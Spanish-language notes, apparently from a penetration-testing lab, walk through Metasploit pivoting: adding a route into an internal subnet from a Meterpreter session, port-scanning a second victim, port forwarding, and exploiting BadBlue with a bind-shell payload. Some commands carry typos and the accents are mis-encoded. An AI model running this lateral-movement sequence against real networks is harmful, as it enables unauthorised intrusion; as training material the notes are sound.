Meterpreter nos brinda la capacidad de agregar una ruta de red a la subred de la red interna, realizar reenvÃo de puertos y, en consecuencia, escanear y explotar otros sistemas en la red.
Port Forwarding
El reenvÃo de puertos o Port Fordwarding es el proceso de redirigir el tráfico desde un puerto especÃfico en un sistema de destino a un puerto especÃfico en nuestro sistema.
En el contexto del pivoteo, podemos reenviar un puerto remoto en un host previamente inaccesible a un puerto local en nuestro sistema Kali Linux para que podamos interactuar/explotar de forma remota el servicio que se ejecuta en el puerto.
Demo: Pivoting
Victim Machine 1: 10.0.29.14
Victim Machine 2: 10.0.29.96
# Post explotacion de la victima 1
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ipconfig
# Crear una ruta con la subred que tiene configurado la vitima en la interfaz
meterpreter > run autoroute -s 10.0.29.0/20
# Ver todas las rutas
meterpreter > run autoroute -p
# Poner en backgraound la sesion de meterpreter
# Buscar el escaneo de puertos
msf6 exploit(windows/http/rejetto_hfs_exec) > search portscan
msf6 exploit(windows/http/rejetto_hfs_exec) > use 5
msf6 auxiliary(scanner/portscan/tcp) > show options
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.29.96
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-100
msf6 auxiliary(scanner/portscan/tcp) > exploit
# Solo LE DIRA LOS PUERTOS ABIERTOS
# Pero si quiere saber mas de la versioon del servicio tiene que hacer un forddwarding
# Por lo cual debera de hacer un port fordwarding
# Ingresamos nuevamente a la sesion
sf6 auxiliary(scanner/portscan/tcp) > sessions
sf6 auxiliary(scanner/portscan/tcp) > sessions 1
meterpreter > portfwd add -1 1234 -p 80 -r 10.0.29.96
# Scaneo con NMAP
root@attackdefense:—# nmap -sv -p 1234 localhost
# DESPUES DE HABER IDENTIFICADO LA VERSION VULNERABLE
# Lo explotamos
msf6 auxiliary(scanner/portscan/tcp) > search BadBlue
msf6 auxiliary(scanner%portscanltcp) > use 1
msf6 auxiliary(scanner%portscanltcp) > set payload windows/meterpreter/bind_tcp
msf6 auxiliary(scanner%portscanltcp) > set RHOSTS 10.0.29.96
msf6 auxiliary(scanner%portscanltcp) > exploit
meterpreter > sysinfo